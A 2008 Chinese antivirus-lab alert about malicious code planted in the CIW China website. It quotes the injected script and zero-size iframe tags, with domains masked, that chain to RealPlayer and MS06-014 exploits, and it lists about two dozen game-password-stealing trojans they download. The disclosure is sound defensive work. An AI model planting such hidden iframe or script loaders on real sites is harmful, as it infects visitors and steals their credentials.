安全响应·Security
病毒预警·Alarm

CIW中国网站挂马事件

出处:安天病毒分析组 2008-03-12 16:50

内容:
 

  3月12日,安天实验室发现,CIW中国网站(http://www.ciwchina.com/)被
黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶
意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致
死机。

  该网站问题代码:

   
  <script src=http://%76%63%63%64%2E%6****></script>
  解密后的url: http://v***.cn
  http://v***.cn 问题框架代码:

 
  
  <iframe src=http://a.2-b****.com/b1.htm?id=017 width=0   
  height=0></iframe>
  http://a.2-b****.com/b1.htm?id=017 被插入框架代码:

 

  <script src="http://b.w****.com/rr.js"></script>
  <iframe src="http://b.w****.com/lz.htm" width=100 height=1>
  </iframe>

  http://b.w****.com/rr.js 网马解密后得出利用REAL漏洞目的是为了下载:  
  http://c.w****.com/ok.exe
  http://b.w****.com/lz.htm解密后:
  
  根据clsid:BD96C556-65A3-11D0-983A-00C04FC29E36利用MS06014来传播:
  http://b.w****.com/ajax.js
  http://b.w****.com/14.htm

  当用户访问http://www.ciwchina.com/时,系统会自动下载以下病毒文件:

  http://c.w****.com/okok.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.sea)

  http://d.w****.com/a1.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tgb)

  http://d.w****.com/a2.exe
  病毒名:(Heur.Trojan.Generic)

  http://d.w****.com/a3.exe
  病毒名:(Trojan.Win32.Vaklik.oy)

  http://d.w****.com/a4.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tim)

  http://d.w****.com/a5.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tjn)

  http://d.w****.com/a6.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tmj)

  http://d.w****.com/a7.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tcr)

  http://d.w****.com/a8.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tcr)

  http://d.w****.com/a9.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tln)

  http://d.w****.com/a10.exe
  病毒名:(Heur.Trojan.Generic)

  http://d.w****.com/a11.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tde)

  http://d.w****.com/a12.exe
  病毒名:(Trojan.Win32.KillAV.pg)

  http://d.w****.com/a13.exe
  病毒名:(Heur.Trojan.Generic)

  http://d.w****.com/a14.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tlm)

  http://d.w****.com/a15.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tyf)

  http://d.w****.com/a16.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tct)

  http://d.w****.com/a17.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tmj)

  http://d.w****.com/a18.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.tlh)

  http://d.w****.com/a19.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.rkf)

  http://d.w****.com/a20.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.sea)

  http://d.w****.com/a21.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.sea)

  http://d.w****.com/a22.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.rkf)

  http://d.w****.com/a23.exe
  病毒名:(Trojan-PSW.Win32.OnLineGames.rkf)

  以上病毒文件为蠕虫和游戏盗号木马,自动运行后将会,盗取用户敏感信息,
甚至导致死机。由于下载数量太多,这里不一一分析。
附:
 

点击此处下载安天防线2008

病毒上报信箱: submit@virusview.net
[TOP]